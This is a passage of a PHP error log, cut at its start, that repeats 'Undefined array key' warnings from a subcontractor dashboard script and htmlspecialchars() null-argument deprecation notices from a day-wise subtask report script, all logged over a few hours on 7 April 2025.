/home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:49:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:50:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:50:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 04:50:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 04:53:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:54:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 04:54:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 04:57:20 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 04:57:20 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 04:57:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:57:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:57:42 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:58:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:01:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:02:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:02:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:08:26 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:08:26 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:09:38 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:09:38 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:09:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:09:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:10:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:11:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:12:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:16:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:16:25 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:16:35 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:18:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:26:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:26:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:26:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:27:08 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:28:23 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:29:35 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:29:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:32:25 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:33:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:33:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:33:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:35:00 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:35:00 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:38:02 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:38:02 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:41:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:42:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:43:04 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:43:18 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:45:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:45:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:48:32 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:48:32 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:49:04 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:56:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:56:39 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:56:39 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:02:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:02:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:02:26 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:02:26 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:02:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:02:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:16:48 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 06:16:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 06:18:36 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:18:36 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:19:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 06:19:30 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:19:30 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:23:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:23:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:29:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:29:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:30:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:30:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:31:12 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:31:12 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:31:33 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:31:33 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:31:43 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:31:43 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:32:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 06:34:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 06:34:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:34:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:35:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 06:44:38 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:44:38 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:48:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:48:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:51:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:51:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:51:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 06:56:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 06:59:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 06:59:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:59:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:02:43 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:02:43 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:05:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:05:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:09:09 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:09:09 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:10:25 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:10:25 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:11:31 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:11:31 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:13:33 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:13:33 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:15:02 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:15:02 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:15:58 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:15:58 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:16:14 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:16:14 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:17:17 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:17:17 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:19:45 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:19:45 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:22:24 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:22:24 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:23:37 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:23:37 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:25:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 07:25:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:25:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:29:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 07:30:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:30:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:30:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:30:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:31:56 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:31:56 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:32:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:32:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:33:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:33:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:33:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:33:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:34:45 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:34:45 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:36:18 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:36:18 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:36:49 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:36:49 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:38:36 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:38:36 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:39:21 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:39:21 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:40:13 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:40:13 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:40:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 07:43:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:43:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 